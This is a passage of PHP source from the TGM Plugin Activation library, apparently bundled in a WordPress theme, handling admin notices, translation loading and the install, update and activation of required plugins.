				array_multisort( $this->sort_order, SORT_ASC, $this->plugins );

				add_action( 'admin_menu', array( $this, 'admin_menu' ) );
				add_action( 'admin_head', array( $this, 'dismiss' ) );

				// Prevent the normal links from showing underneath a single install/update page.
				add_filter( 'install_plugin_complete_actions', array( $this, 'actions' ) );
				add_filter( 'update_plugin_complete_actions', array( $this, 'actions' ) );

				if ( $this->has_notices ) {
					add_action( 'admin_notices', array( $this, 'notices' ) );
					add_action( 'admin_init', array( $this, 'admin_init' ), 1 );
					add_action( 'admin_enqueue_scripts', array( $this, 'thickbox' ) );
				}
			}

			// If needed, filter plugin action links.
			add_action( 'load-plugins.php', array( $this, 'add_plugin_action_link_filters' ), 1 );

			// Make sure things get reset on switch theme.
			add_action( 'switch_theme', array( $this, 'flush_plugins_cache' ) );

			if ( $this->has_notices ) {
				add_action( 'switch_theme', array( $this, 'update_dismiss' ) );
			}

			// Setup the force activation hook.
			if ( true === $this->has_forced_activation ) {
				add_action( 'admin_init', array( $this, 'force_activation' ) );
			}

			// Setup the force deactivation hook.
			if ( true === $this->has_forced_deactivation ) {
				add_action( 'switch_theme', array( $this, 'force_deactivation' ) );
			}
		}

		/**
		 * Load translations.
		 *
		 * @since 2.6.0
		 *
		 * (@internal Uses `load_theme_textdomain()` rather than `load_plugin_textdomain()` to
		 * get round the different ways of handling the path and deprecated notices being thrown
		 * and such. For plugins, the actual file name will be corrected by a filter.}}
		 *
		 * {@internal IMPORTANT! If this function changes, review the regex in the custom TGMPA
		 * generator on the website.}}
		 */
		public function load_textdomain() {
			if ( is_textdomain_loaded( 'tgmpa' ) ) {
				return;
			}

			if ( false !== strpos( __FILE__, WP_PLUGIN_DIR ) || false !== strpos( __FILE__, WPMU_PLUGIN_DIR ) ) {
				// Plugin, we'll need to adjust the file name.
				add_action( 'load_textdomain_mofile', array( $this, 'correct_plugin_mofile' ), 10, 2 );
				load_theme_textdomain( 'tgmpa', dirname( __FILE__ ) . '/languages' );
				remove_action( 'load_textdomain_mofile', array( $this, 'correct_plugin_mofile' ), 10 );
			} else {
				load_theme_textdomain( 'tgmpa', dirname( __FILE__ ) . '/languages' );
			}
		}

		/**
		 * Correct the .mo file name for (must-use) plugins.
		 *
		 * Themese use `/path/{locale}.mo` while plugins use `/path/{text-domain}-{locale}.mo`.
		 *
		 * {@internal IMPORTANT! If this function changes, review the regex in the custom TGMPA
		 * generator on the website.}}
		 *
		 * @since 2.6.0
		 *
		 * @param string $mofile Full path to the target mofile.
		 * @param string $domain The domain for which a language file is being loaded.
		 * @return string $mofile
		 */
		public function correct_plugin_mofile( $mofile, $domain ) {
			// Exit early if not our domain (just in case).
			if ( 'tgmpa' !== $domain ) {
				return $mofile;
			}
			return preg_replace( '`/([a-z]{2}_[A-Z]{2}.mo)$`', '/tgmpa-$1', $mofile );
		}

		/**
		 * Potentially overload the fall-back translation file for the current language.
		 *
		 * WP, by default since WP 3.7, will load a local translation first and if none
		 * can be found, will try and find a translation in the /wp-content/languages/ directory.
		 * As this library is theme/plugin agnostic, translation files for TGMPA can exist both
		 * in the WP_LANG_DIR /plugins/ subdirectory as well as in the /themes/ subdirectory.
		 *
		 * This method makes sure both directories are checked.
		 *
		 * {@internal IMPORTANT! If this function changes, review the regex in the custom TGMPA
		 * generator on the website.}}
		 *
		 * @since 2.6.0
		 *
		 * @param string $mofile Full path to the target mofile.
		 * @param string $domain The domain for which a language file is being loaded.
		 * @return string $mofile
		 */
		public function overload_textdomain_mofile( $mofile, $domain ) {
			// Exit early if not our domain, not a WP_LANG_DIR load or if the file exists and is readable.
			if ( 'tgmpa' !== $domain || false === strpos( $mofile, WP_LANG_DIR ) || @is_readable( $mofile ) ) {
				return $mofile;
			}

			// Current fallback file is not valid, let's try the alternative option.
			if ( false !== strpos( $mofile, '/themes/' ) ) {
				return str_replace( '/themes/', '/plugins/', $mofile );
			} elseif ( false !== strpos( $mofile, '/plugins/' ) ) {
				return str_replace( '/plugins/', '/themes/', $mofile );
			} else {
				return $mofile;
			}
		}

		/**
		 * Hook in plugin action link filters for the WP native plugins page.
		 *
		 * - Prevent activation of plugins which don't meet the minimum version requirements.
		 * - Prevent deactivation of force-activated plugins.
		 * - Add update notice if update available.
		 *
		 * @since 2.5.0
		 */
		public function add_plugin_action_link_filters() {
			foreach ( $this->plugins as $slug => $plugin ) {
				if ( false === $this->can_plugin_activate( $slug ) ) {
					add_filter( 'plugin_action_links_' . $plugin['file_path'], array( $this, 'filter_plugin_action_links_activate' ), 20 );
				}

				if ( true === $plugin['force_activation'] ) {
					add_filter( 'plugin_action_links_' . $plugin['file_path'], array( $this, 'filter_plugin_action_links_deactivate' ), 20 );
				}

				if ( false !== $this->does_plugin_require_update( $slug ) ) {
					add_filter( 'plugin_action_links_' . $plugin['file_path'], array( $this, 'filter_plugin_action_links_update' ), 20 );
				}
			}
		}

		/**
		 * Remove the 'Activate' link on the WP native plugins page if the plugin does not meet the
		 * minimum version requirements.
		 *
		 * @since 2.5.0
		 *
		 * @param array $actions Action links.
		 * @return array
		 */
		public function filter_plugin_action_links_activate( $actions ) {
			unset( $actions['activate'] );

			return $actions;
		}

		/**
		 * Remove the 'Deactivate' link on the WP native plugins page if the plugin has been set to force activate.
		 *
		 * @since 2.5.0
		 *
		 * @param array $actions Action links.
		 * @return array
		 */
		public function filter_plugin_action_links_deactivate( $actions ) {
			unset( $actions['deactivate'] );

			return $actions;
		}

		/**
		 * Add a 'Requires update' link on the WP native plugins page if the plugin does not meet the
		 * minimum version requirements.
		 *
		 * @since 2.5.0
		 *
		 * @param array $actions Action links.
		 * @return array
		 */
		public function filter_plugin_action_links_update( $actions ) {
			$actions['update'] = sprintf(
				'<a href="%1$s" title="%2$s" class="edit">%3$s</a>',
				esc_url( $this->get_tgmpa_status_url( 'update' ) ),
				esc_attr__( 'This plugin needs to be updated to be compatible with your theme.', 'maxbizz' ),
				esc_html__( 'Update Required', 'maxbizz' )
			);

			return $actions;
		}

		/**
		 * Handles calls to show plugin information via links in the notices.
		 *
		 * We get the links in the admin notices to point to the TGMPA page, rather
		 * than the typical plugin-install.php file, so we can prepare everything
		 * beforehand.
		 *
		 * WP does not make it easy to show the plugin information in the thickbox -
		 * here we have to require a file that includes a function that does the
		 * main work of displaying it, enqueue some styles, set up some globals and
		 * finally call that function before exiting.
		 *
		 * Down right easy once you know how...
		 *
		 * Returns early if not the TGMPA page.
		 *
		 * @since 2.1.0
		 *
		 * @global string $tab Used as iframe div class names, helps with styling
		 * @global string $body_id Used as the iframe body ID, helps with styling
		 *
		 * @return null Returns early if not the TGMPA page.
		 */
		public function admin_init() {
			if ( ! $this->is_tgmpa_page() ) {
				return;
			}

			if ( isset( $_REQUEST['tab'] ) && 'plugin-information' === $_REQUEST['tab'] ) {
				// Needed for install_plugin_information().
				require_once ABSPATH . 'wp-admin/includes/plugin-install.php';

				wp_enqueue_style( 'plugin-install' );

				global $tab, $body_id;
				$body_id = 'plugin-information';
				// @codingStandardsIgnoreStart
				$tab     = 'plugin-information';
				// @codingStandardsIgnoreEnd

				install_plugin_information();

				exit;
			}
		}

		/**
		 * Enqueue thickbox scripts/styles for plugin info.
		 *
		 * Thickbox is not automatically included on all admin pages, so we must
		 * manually enqueue it for those pages.
		 *
		 * Thickbox is only loaded if the user has not dismissed the admin
		 * notice or if there are any plugins left to install and activate.
		 *
		 * @since 2.1.0
		 */
		public function thickbox() {
			if ( ! get_user_meta( get_current_user_id(), 'tgmpa_dismissed_notice_' . $this->id, true ) ) {
				add_thickbox();
			}
		}

		/**
		 * Adds submenu page if there are plugin actions to take.
		 *
		 * This method adds the submenu page letting users know that a required
		 * plugin needs to be installed.
		 *
		 * This page disappears once the plugin has been installed and activated.
		 *
		 * @since 1.0.0
		 *
		 * @see TGM_Plugin_Activation::init()
		 * @see TGM_Plugin_Activation::install_plugins_page()
		 *
		 * @return null Return early if user lacks capability to install a plugin.
		 */
		public function admin_menu() {
			// Make sure privileges are correct to see the page.
			if ( ! current_user_can( 'install_plugins' ) ) {
				return;
			}
			$args = apply_filters(
				'tgmpa_admin_menu_args',
				array(
					'page_title'  => $this->strings['page_title'],           // Page title.
					'menu_title'  => $this->strings['menu_title'],           // Menu title.
					'capability'  => $this->capability,                      // Capability.
					'menu_slug'   => $this->menu,                            // Menu slug.
					'function'    => array( $this, 'install_plugins_page' ), // Callback.
				)
			);
			$this->add_admin_menu( $args );
		}
		/**
		 * Add the menu item.
		 *
		 * @since 2.5.0
		 *
		 * @param array $args Menu item configuration.
		 */
		protected function add_admin_menu( array $args ) {
			if ( has_filter( 'tgmpa_admin_menu_use_add_theme_page' ) ) {
				_deprecated_function( 'The "tgmpa_admin_menu_use_add_theme_page" filter', '2.5.0', esc_html__( 'The tgmpa_admin_menu_use_add_theme_page filter is deprecated.', 'maxbizz' ) );
			}
			$this->page_hook = add_theme_page( $args['page_title'], $args['menu_title'], $args['capability'], $args['menu_slug'], $args['function'] );
		}

		/**
		 * Echoes plugin installation form.
		 *
		 * This method is the callback for the admin_menu method function.
		 * This displays the admin page and form area where the user can select to install and activate the plugin.
		 * Aborts early if we're processing a plugin installation action.
		 *
		 * @since 1.0.0
		 *
		 * @return null Aborts early if we're processing a plugin installation action.
		 */
		public function install_plugins_page() {
			// Store new instance of plugin table in object.
			$plugin_table = new TGMPA_List_Table;

			// Return early if processing a plugin installation action.
			if ( ( ( 'tgmpa-bulk-install' === $plugin_table->current_action() || 'tgmpa-bulk-update' === $plugin_table->current_action() ) && $plugin_table->process_bulk_actions() ) || $this->do_plugin_install() ) {
				return;
			}

			// Force refresh of available plugin information so we'll know about manual updates/deletes.
			wp_clean_plugins_cache( false );

			?>
			<div class="tgmpa wrap">
				<h1><?php echo esc_html( get_admin_page_title() ); ?></h1>
				<?php $plugin_table->prepare_items(); ?>

				<?php
				if ( ! empty( $this->message ) && is_string( $this->message ) ) {
					echo wp_kses_post( $this->message );
				}
				?>
				<?php $plugin_table->views(); ?>

				<form id="tgmpa-plugins" action="" method="post">
					<input type="hidden" name="tgmpa-page" value="<?php echo esc_attr( $this->menu ); ?>" />
					<input type="hidden" name="plugin_status" value="<?php echo esc_attr( $plugin_table->view_context ); ?>" />
					<?php $plugin_table->display(); ?>
				</form>
			</div>
			<?php
		}

		/**
		 * Installs, updates or activates a plugin depending on the action link clicked by the user.
		 *
		 * Checks the $_GET variable to see which actions have been
		 * passed and responds with the appropriate method.
		 *
		 * Uses WP_Filesystem to process and handle the plugin installation
		 * method.
		 *
		 * @since 1.0.0
		 *
		 * @uses WP_Filesystem
		 * @uses WP_Error
		 * @uses WP_Upgrader
		 * @uses Plugin_Upgrader
		 * @uses Plugin_Installer_Skin
		 * @uses Plugin_Upgrader_Skin
		 *
		 * @return boolean True on success, false on failure.
		 */
		protected function do_plugin_install() {
			if ( empty( $_GET['plugin'] ) ) {
				return false;
			}

			// All plugin information will be stored in an array for processing.
			$slug = $this->sanitize_key( urldecode( $_GET['plugin'] ) );

			if ( ! isset( $this->plugins[ $slug ] ) ) {
				return false;
			}

			// Was an install or upgrade action link clicked?
			if ( ( isset( $_GET['tgmpa-install'] ) && 'install-plugin' === $_GET['tgmpa-install'] ) || ( isset( $_GET['tgmpa-update'] ) && 'update-plugin' === $_GET['tgmpa-update'] ) ) {

				$install_type = 'install';
				if ( isset( $_GET['tgmpa-update'] ) && 'update-plugin' === $_GET['tgmpa-update'] ) {
					$install_type = 'update';
				}

				check_admin_referer( 'tgmpa-' . $install_type, 'tgmpa-nonce' );

				// Pass necessary information via URL if WP_Filesystem is needed.
				$url = wp_nonce_url(
					add_query_arg(
						array(
							'plugin'                 => urlencode( $slug ),
							'tgmpa-' . $install_type => $install_type . '-plugin',
						),
						$this->get_tgmpa_url()
					),
					'tgmpa-' . $install_type,
					'tgmpa-nonce'
				);

				$method = ''; // Leave blank so WP_Filesystem can populate it as necessary.

				if ( false === ( $creds = request_filesystem_credentials( esc_url_raw( $url ), $method, false, false, array() ) ) ) {
					return true;
				}

				if ( ! WP_Filesystem( $creds ) ) {
					request_filesystem_credentials( esc_url_raw( $url ), $method, true, false, array() ); // Setup WP_Filesystem.
					return true;
				}

				/* If we arrive here, we have the filesystem. */

				// Prep variables for Plugin_Installer_Skin class.
				$extra         = array();
				$extra['slug'] = $slug; // Needed for potentially renaming of directory name.
				$source        = $this->get_download_url( $slug );
				$api           = ( 'repo' === $this->plugins[ $slug ]['source_type'] ) ? $this->get_plugins_api( $slug ) : null;
				$api           = ( false !== $api ) ? $api : null;

				$url = add_query_arg(
					array(
						'action' => $install_type . '-plugin',
						'plugin' => urlencode( $slug ),
					),
					'update.php'
				);

				if ( ! class_exists( 'Plugin_Upgrader', false ) ) {
					require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
				}

				$title     = ( 'update' === $install_type ) ? $this->strings['updating'] : $this->strings['installing'];
				$skin_args = array(
					'type'   => ( 'bundled' !== $this->plugins[ $slug ]['source_type'] ) ? 'web' : 'upload',
					'title'  => sprintf( $title, $this->plugins[ $slug ]['name'] ),
					'url'    => esc_url_raw( $url ),
					'nonce'  => $install_type . '-plugin_' . $slug,
					'plugin' => '',
					'api'    => $api,
					'extra'  => $extra,
				);
				unset( $title );

				if ( 'update' === $install_type ) {
					$skin_args['plugin'] = $this->plugins[ $slug ]['file_path'];
					$skin                = new Plugin_Upgrader_Skin( $skin_args );
				} else {
					$skin = new Plugin_Installer_Skin( $skin_args );
				}

				// Create a new instance of Plugin_Upgrader.
				$upgrader = new Plugin_Upgrader( $skin );

				// Perform the action and install the plugin from the $source urldecode().
				add_filter( 'upgrader_source_selection', array( $this, 'maybe_adjust_source_dir' ), 1, 3 );

				if ( 'update' === $install_type ) {
					// Inject our info into the update transient.
					$to_inject                    = array( $slug => $this->plugins[ $slug ] );
					$to_inject[ $slug ]['source'] = $source;
					$this->inject_update_info( $to_inject );

					$upgrader->upgrade( $this->plugins[ $slug ]['file_path'] );
				} else {
					$upgrader->install( $source );
				}

				remove_filter( 'upgrader_source_selection', array( $this, 'maybe_adjust_source_dir' ), 1 );

				// Make sure we have the correct file path now the plugin is installed/updated.
				$this->populate_file_path( $slug );

				// Only activate plugins if the config option is set to true and the plugin isn't
				// already active (upgrade).
				if ( $this->is_automatic && ! $this->is_plugin_active( $slug ) ) {
					$plugin_activate = $upgrader->plugin_info(); // Grab the plugin info from the Plugin_Upgrader method.
					if ( false === $this->activate_single_plugin( $plugin_activate, $slug, true ) ) {
						return true; // Finish execution of the function early as we encountered an error.
					}
				}

				$this->show_tgmpa_version();

				// Display message based on if all plugins are now active or not.
				if ( $this->is_tgmpa_complete() ) {
					echo '<p>', sprintf( esc_html( $this->strings['complete'] ), '<a href="' . esc_url( self_admin_url() ) . '">' . esc_html__( 'Return to the Dashboard', 'maxbizz' ) . '</a>' ), '</p>';
					echo '<style type="text/css">#adminmenu .wp-submenu li.current { display: none !important; }</style>';
				} else {
					echo '<p><a href="', esc_url( $this->get_tgmpa_url() ), '" target="_parent">', esc_html( $this->strings['return'] ), '</a></p>';
				}

				return true;
			} elseif ( isset( $this->plugins[ $slug ]['file_path'], $_GET['tgmpa-activate'] ) && 'activate-plugin' === $_GET['tgmpa-activate'] ) {
				// Activate action link was clicked.
				check_admin_referer( 'tgmpa-activate', 'tgmpa-nonce' );

				if ( false === $this->activate_single_plugin( $this->plugins[ $slug ]['file_path'], $slug ) ) {
					return true; // Finish execution of the function early as we encountered an error.
				}
			}

			return false;
		}

		/**
		 * Inject information into the 'update_plugins' site transient as WP checks that before running an update.
		 *
		 * @since 2.5.0
		 *
		 * @param array $plugins The plugin information for the plugins which are to be updated.
		 */
		public function inject_update_info( $plugins ) {
			$repo_updates = get_site_transient( 'update_plugins' );

			if ( ! is_object( $repo_updates ) ) {
				$repo_updates = new stdClass;
			}

			foreach ( $plugins as $slug => $plugin ) {
				$file_path = $plugin['file_path'];

				if ( empty( $repo_updates->response[ $file_path ] ) ) {
					$repo_updates->response[ $file_path ] = new stdClass;
				}

				// We only really need to set package, but let's do all we can in case WP changes something.
				$repo_updates->response[ $file_path ]->slug        = $slug;
				$repo_updates->response[ $file_path ]->plugin      = $file_path;
				$repo_updates->response[ $file_path ]->new_version = $plugin['version'];
				$repo_updates->response[ $file_path ]->package     = $plugin['source'];
				if ( empty( $repo_updates->response[ $file_path ]->url ) && ! empty( $plugin['external_url'] ) ) {
					$repo_updates->response[ $file_path ]->url = $plugin['external_url'];
				}
			}

			set_site_transient( 'update_plugins', $repo_updates );
		}

		/**
		 * Adjust the plugin directory name if necessary.
		 *
		 * The final destination directory of a plugin is based on the subdirectory name found in the
		 * (un)zipped source. In some cases - most notably GitHub repository plugin downloads -, this
		 * subdirectory name is not the same as the expected slug and the plugin will not be recognized
		 * as installed. This is fixed by adjusting the temporary unzipped source subdirectory name to
		 * the expected plugin slug.
		 *
		 * @since 2.5.0
		 *
		 * @param string       $source        Path to upgrade/zip-file-name.tmp/subdirectory/.
		 * @param string       $remote_source Path to upgrade/zip-file-name.tmp.
		 * @param \WP_Upgrader $upgrader      Instance of the upgrader which installs the plugin.
		 * @return string $source
		 */
		public function maybe_adjust_source_dir( $source, $remote_source, $upgrader ) {
			if ( ! $this->is_tgmpa_page() || ! is_object( $GLOBALS['wp_filesystem'] ) ) {
				return $source;
			}

			// Check for single file plugins.
			$source_files = array_keys( $GLOBALS['wp_filesystem']->dirlist( $remote_source ) );
			if ( 1 === count( $source_files ) && false === $GLOBALS['wp_filesystem']->is_dir( $source ) ) {
				return $source;
			}

			// Multi-file plugin, let's see if the directory is correctly named.
			$desired_slug = '';

			// Figure out what the slug is supposed to be.
			if ( false === $upgrader->bulk && ! empty( $upgrader->skin->options['extra']['slug'] ) ) {
				$desired_slug = $upgrader->skin->options['extra']['slug'];
			} else {
				// Bulk installer contains less info, so fall back on the info registered here.
				foreach ( $this->plugins as $slug => $plugin ) {
					if ( ! empty( $upgrader->skin->plugin_names[ $upgrader->skin->i ] ) && $plugin['name'] === $upgrader->skin->plugin_names[ $upgrader->skin->i ] ) {
						$desired_slug = $slug;
						break;
					}
				}
				unset( $slug, $plugin );
			}

			if ( ! empty( $desired_slug ) ) {
				$subdir_name = untrailingslashit( str_replace( trailingslashit( $remote_source ), '', $source ) );

				if ( ! empty( $subdir_name ) && $subdir_name !== $desired_slug ) {
					$from_path = untrailingslashit( $source );
					$to_path   = trailingslashit( $remote_source ) . $desired_slug;

					if ( true === $GLOBALS['wp_filesystem']->move( $from_path, $to_path ) ) {
						return trailingslashit( $to_path );
					} else {
						return new WP_Error( 'rename_failed', esc_html__( 'The remote plugin package does not contain a folder with the desired slug and renaming did not work.', 'maxbizz' ) . ' ' . esc_html__( 'Please contact the plugin provider and ask them to package their plugin according to the WordPress guidelines.', 'maxbizz' ), array( 'found' => $subdir_name, 'expected' => $desired_slug ) );
					}
				} elseif ( empty( $subdir_name ) ) {
					return new WP_Error( 'packaged_wrong', esc_html__( 'The remote plugin package consists of more than one file, but the files are not packaged in a folder.', 'maxbizz' ) . ' ' . esc_html__( 'Please contact the plugin provider and ask them to package their plugin according to the WordPress guidelines.', 'maxbizz' ), array( 'found' => $subdir_name, 'expected' => $desired_slug ) );
				}
			}

			return $source;
		}

		/**
		 * Activate a single plugin and send feedback about the result to the screen.
		 *
		 * @since 2.5.0
		 *
		 * @param string $file_path Path within wp-plugins/ to main plugin file.
		 * @param string $slug      Plugin slug.
		 * @param bool   $automatic Whether this is an automatic activation after an install. Defaults to false.
		 *                          This determines the styling of the output messages.
		 * @return bool False if an error was encountered, true otherwise.
		 */
		protected function activate_single_plugin( $file_path, $slug, $automatic = false ) {
			if ( $this->can_plugin_activate( $slug ) ) {
				$activate = activate_plugin( $file_path );

				if ( is_wp_error( $activate ) ) {
					echo '<div id="message" class="error"><p>', wp_kses_post( $activate->get_error_message() ), '</p></div>',
						'<p><a href="', esc_url( $this->get_tgmpa_url() ), '" target="_parent">', esc_html( $this->strings['return'] ), '</a></p>';

					return false; // End it here if there is an error with activation.
				} else {
					if ( ! $automatic ) {
						// Make sure message doesn't display again if bulk activation is performed
						// immediately after a single activation.
						if ( ! isset( $_POST['action'] ) ) { // WPCS: CSRF OK.
							echo '<div id="message" class="updated"><p>', esc_html( $this->strings['activated_successfully'] ), ' <strong>', esc_html( $this->plugins[ $slug ]['name'] ), '.</strong></p></div>';
						}
					} else {
						// Simpler message layout for use on the plugin install page.
						echo '<p>', esc_html( $this->strings['plugin_activated'] ), '</p>';
					}
				}
			} elseif ( $this->is_plugin_active( $slug ) ) {
				// No simpler message format provided as this message should never be encountered
				// on the plugin install page.
				echo '<div id="message" class="error"><p>',
					sprintf(
						esc_html( $this->strings['plugin_already_active'] ),
						'<strong>' . esc_html( $this->plugins[ $slug ]['name'] ) . '</strong>'
					),
					'</p></div>';
			} elseif ( $this->does_plugin_require_update( $slug ) ) {
				if ( ! $automatic ) {
					// Make sure message doesn't display again if bulk activation is performed
					// immediately after a single activation.
					if ( ! isset( $_POST['action'] ) ) { // WPCS: CSRF OK.
						echo '<div id="message" class="error"><p>',
							sprintf(
								esc_html( $this->strings['plugin_needs_higher_version'] ),
								'<strong>' . esc_html( $this->plugins[ $slug ]['name'] ) . '</strong>'
							),
							'</p></div>';
					}
				} else {
					// Simpler message layout for use on the plugin install page.
					echo '<p>', sprintf( esc_html( $this->strings['plugin_needs_higher_version'] ), esc_html( $this->plugins[ $slug ]['name'] ) ), '</p>';
				}
			}

			return true;
		}

		/**
		 * Echoes required plugin notice.
		 *
		 * Outputs a message telling users that a specific plugin is required for
		 * their theme. If appropriate, it includes a link to the form page where
		 * users can install and activate the plugin.
		 *
		 * Returns early if we're on the Install page.
		 *
		 * @since 1.0.0
		 *
		 * @global object $current_screen
		 *
		 * @return null Returns early if we're on the Install page.
		 */
		public function notices() {
			// Remove nag on the install page / Return early if the nag message has been dismissed or user < author.
			if ( ( $this->is_tgmpa_page() || $this->is_core_update_page() ) || get_user_meta( get_current_user_id(), 'tgmpa_dismissed_notice_' . $this->id, true ) || ! current_user_can( apply_filters( 'tgmpa_show_admin_notice_capability', 'publish_posts' ) ) ) {
				return;
			}

			// Store for the plugin slugs by message type.
			$message = array();

			// Initialize counters used to determine plurality of action link texts.
			$install_link_count          = 0;
			$update_link_count           = 0;
			$activate_link_count         = 0;
			$total_required_action_count = 0;

			foreach ( $this->plugins as $slug => $plugin ) {
				if ( $this->is_plugin_active( $slug ) && false === $this->does_plugin_have_update( $slug ) ) {
					continue;
				}

				if ( ! $this->is_plugin_installed( $slug ) ) {
					if ( current_user_can( 'install_plugins' ) ) {
						$install_link_count++;

						if ( true === $plugin['required'] ) {
							$message['notice_can_install_required'][] = $slug;
						} else {
							$message['notice_can_install_recommended'][] = $slug;
						}
					}
					if ( true === $plugin['required'] ) {
						$total_required_action_count++;
					}
				} else {
					if ( ! $this->is_plugin_active( $slug ) && $this->can_plugin_activate( $slug ) ) {
						if ( current_user_can( 'activate_plugins' ) ) {
							$activate_link_count++;

							if ( true === $plugin['required'] ) {
								$message['notice_can_activate_required'][] = $slug;
							} else {
								$message['notice_can_activate_recommended'][] = $slug;
							}
						}
						if ( true === $plugin['required'] ) {
							$total_required_action_count++;
						}
					}

					if ( $this->does_plugin_require_update( $slug ) || false !== $this->does_plugin_have_update( $slug ) ) {

						if ( current_user_can( 'update_plugins' ) ) {
							$update_link_count++;

							if ( $this->does_plugin_require_update( $slug ) ) {
								$message['notice_ask_to_update'][] = $slug;
							} elseif ( false !== $this->does_plugin_have_update( $slug ) ) {
								$message['notice_ask_to_update_maybe'][] = $slug;
							}
						}
						if ( true === $plugin['required'] ) {
							$total_required_action_count++;
						}
					}
				}
			}
			unset( $slug, $plugin );

			// If we have notices to display, we move forward.
			if ( ! empty( $message ) || $total_required_action_count > 0 ) {
				krsort( $message ); // Sort messages.
				$rendered = '';

				// As add_settings_error() wraps the final message in a <p> and as the final message can't be
				// filtered, using <p>'s in our html would render invalid html output.
				$line_template = '<span style="display: block; margin: 0.5em 0.5em 0 0; clear: both;">%s</span>' . "\n";

				if ( ! current_user_can( 'activate_plugins' ) && ! current_user_can( 'install_plugins' ) && ! current_user_can( 'update_plugins' ) ) {
					$rendered  = esc_html( $this->strings['notice_cannot_install_activate'] ) . ' ' . esc_html( $this->strings['contact_admin'] );
					$rendered .= $this->create_user_action_links_for_notice( 0, 0, 0, $line_template );
				} else {

					// If dismissable is false and a message is set, output it now.
					if ( ! $this->dismissable && ! empty( $this->dismiss_msg ) ) {
						$rendered .= sprintf( $line_template, wp_kses_post( $this->dismiss_msg ) );
					}

					// Render the individual message lines for the notice.
					foreach ( $message as $type => $plugin_group ) {
						$linked_plugins = array();

						// Get the external info link for a plugin if one is available.
						foreach ( $plugin_group as $plugin_slug ) {
							$linked_plugins[] = $this->get_info_link( $plugin_slug );
						}
						unset( $plugin_slug );

						$count          = count( $plugin_group );
						$linked_plugins = array_map( array( 'TGMPA_Utils', 'wrap_in_em' ), $linked_plugins );
						$last_plugin    = array_pop( $linked_plugins ); // Pop off last name to prep for readability.
						$imploded       = empty( $linked_plugins ) ? $last_plugin : ( implode( ', ', $linked_plugins ) . ' ' . esc_html_x( 'and', 'plugin A *and* plugin B', 'maxbizz' ) . ' ' . $last_plugin );

						$rendered .= sprintf(
							$line_template,
							sprintf(
								translate_nooped_plural( $this->strings[ $type ], $count, 'maxbizz' ),
								$imploded,
								$count
							)
						);

					}
					unset( $type, $plugin_group, $linked_plugins, $count, $last_plugin, $imploded );

					$rendered .= $this->create_user_action_links_for_notice( $install_link_count, $update_link_count, $activate_link_count, $line_template );
				}

				// Register the nag messages and prepare them to be processed.
				add_settings_error( 'tgmpa', 'tgmpa', $rendered, $this->get_admin_notice_class() );
			}

			// Admin options pages already output settings_errors, so this is to avoid duplication.
			if ( 'options-general' !== $GLOBALS['current_screen']->parent_base ) {
				$this->display_settings_errors();
			}
		}

		/**
		 * Generate the user action links for the admin notice.
		 *
		 * @since 2.6.0
		 *
		 * @param int $install_count  Number of plugins to install.
		 * @param int $update_count   Number of plugins to update.
		 * @param int $activate_count Number of plugins to activate.
		 * @param int $line_template  Template for the HTML tag to output a line.
		 * @return string Action links.
		 */
		protected function create_user_action_links_for_notice( $install_count, $update_count, $activate_count, $line_template ) {
			// Setup action links.
			$action_links = array(
				'install'  => '',
				'update'   => '',
				'activate' => '',
				'dismiss'  => $this->dismissable ? '<a href="' . esc_url( wp_nonce_url( add_query_arg( 'tgmpa-dismiss', 'dismiss_admin_notices' ), 'tgmpa-dismiss-' . get_current_user_id() ) ) . '" class="dismiss-notice" target="_parent">' . esc_html( $this->strings['dismiss'] ) . '</a>' : '',
			);

			$link_template = '<a href="%2$s">%1$s</a>';

			if ( current_user_can( 'install_plugins' ) ) {
				if ( $install_count > 0 ) {
					$action_links['install'] = sprintf(
						$link_template,
						translate_nooped_plural( $this->strings['install_link'], $install_count, 'maxbizz' ),
						esc_url( $this->get_tgmpa_status_url( 'install' ) )
					);
				}
				if ( $update_count > 0 ) {
					$action_links['update'] = sprintf(
						$link_template,
						translate_nooped_plural( $this->strings['update_link'], $update_count, 'maxbizz' ),
						esc_url( $this->get_tgmpa_status_url( 'update' ) )
					);
				}
			}

			if ( current_user_can( 'activate_plugins' ) && $activate_count > 0 ) {
				$action_links['activate'] = sprintf(
					$link_template,
					translate_nooped_plural( $this->strings['activate_link'], $activate_count, 'maxbizz' ),
					esc_url( $this->get_tgmpa_status_url( 'activate' ) )
				);
			}

			$action_links = apply_filters( 'tgmpa_notice_action_links', $action_links );

			$action_links = array_filter( (array) $action_links ); // Remove any empty array items.

			if ( ! empty( $action_links ) ) {
				$action_links = sprintf( $line_template, implode( ' | ', $action_links ) );
				return apply_filters( 'tgmpa_notice_rendered_action_links', $action_links );
			} else {
				return '';
			}
		}

		/**
		 * Get admin notice class.
		 *
		 * Work around all the changes to the various admin notice classes between WP 4.4 and 3.7
		 * (lowest supported version by TGMPA).
		 *
		 * @since 2.6.0
		 *
		 * @return string
		 */
		protected function get_admin_notice_class() {
			if ( ! empty( $this->strings['nag_type'] ) ) {
				return sanitize_html_class( strtolower( $this->strings['nag_type'] ) );
			} else {
				if ( version_compare( $this->wp_version, '4.2', '>=' ) ) {
					return 'notice-warning';
				} elseif ( version_compare( $this->wp_version, '4.1', '>=' ) ) {
					return 'notice';
				} else {
					return 'updated';
				}
			}
		}

		/**
		 * Display settings errors and remove those which have been displayed to avoid duplicate messages showing
		 *
		 * @since 2.5.0
		 */
		protected function display_settings_errors() {
			global $wp_settings_errors;

			settings_errors( 'tgmpa' );

			foreach ( (array) $wp_settings_errors as $key => $details ) {
				if ( 'tgmpa' === $details['setting'] ) {
					unset( $wp_settings_errors[ $key ] );
					break;
				}
			}
		}

		/**
		 * Register dismissal of admin notices.
		 *
		 * Acts on the dismiss link in the admin nag messages.
		 * If clicked, the admin notice disappears and will no longer be visible to this user.
		 *
		 * @since 2.1.0
		 */
		public function dismiss() {
			if ( isset( $_GET['tgmpa-dismiss'] ) && check_admin_referer( 'tgmpa-dismiss-' . get_current_user_id() ) ) {
				update_user_meta( get_current_user_id(), 'tgmpa_dismissed_notice_' . $this->id, 1 );
			}
		}

		/**
		 * Add individual plugin to our collection of plugins.
		 *
		 * If the required keys are not set or the plugin has already
		 * been registered, the plugin is not added.
		 *
		 * @since 2.0.0
		 *
		 * @param array|null $plugin Array of plugin arguments or null if invalid argument.
		 * @return null Return early if incorrect argument.
		 */
		public function register( $plugin ) {
			if ( empty( $plugin['slug'] ) || empty( $plugin['name'] ) ) {
				return;
			}

			if ( empty( $plugin['slug'] ) || ! is_string( $plugin['slug'] ) || isset( $this->plugins[ $plugin['slug'] ] ) ) {
				return;
			}

			$defaults = array(
